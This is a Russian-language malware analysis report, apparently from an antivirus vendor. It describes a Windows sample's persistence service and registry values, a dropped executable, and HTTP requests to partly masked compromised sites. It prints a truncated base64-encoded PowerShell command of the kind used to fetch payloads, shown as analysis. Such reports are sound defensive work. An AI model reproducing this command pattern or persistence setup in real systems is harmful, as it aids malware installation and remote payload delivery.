Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\NlsLexicons004a] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsLexicons004a] 'ImagePath' = '"%WINDIR%\SysWOW64\cngaudit\NlsLexicons004a.exe"'
Создает следующие сервисы
- 'NlsLexicons004a' "%WINDIR%\SysWOW64\cngaudit\NlsLexicons004a.exe"
- 'NlsLexicons004a' %WINDIR%\SysWOW64\cngaudit\NlsLexicons004a.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAFEAWgBPAFcAdgBlAGIAPQAnAEMATABRAE8AUAB2AG8AbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABjAFUAYABSAGAAaQBUAHkAcAByAE8AYABUAE8AQwBPAGwAIgAgAD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\79.exe
Перемещает следующие файлы
- %HOMEPATH%\79.exe в %WINDIR%\syswow64\cngaudit\nlslexicons004a.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://www.nc##.org.ng/wp-content/3_tcn_pc/
- http://nc##.org.ng/wp-content/3_tcn_pc/
- http://www.sk####rynepal.org/wp-admin/m_u8_iv41d84ow/
- http://www.hl###ared.ca/cache/e_q84_jobz/
- http://www.vi##.co.ke/cgi-bin/h_2lnix_2y/
UDP
- DNS ASK nc##.org.ng
- DNS ASK sk####rynepal.org
- DNS ASK ca###atea.nl
- DNS ASK hl###ared.ca
- DNS ASK vi##.co.ke
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\79.exe'
- '%WINDIR%\syswow64\cngaudit\nlslexicons004a.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAFEAWgBPAFcAdgBlAGIAPQAnAEMATABRAE8AUAB2AG8AbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABjAFUAYABSAGAAaQBUAHkAcAByAE8AYABUAE8AQwBPAGwAIgAgAD...' (со скрытым окном)
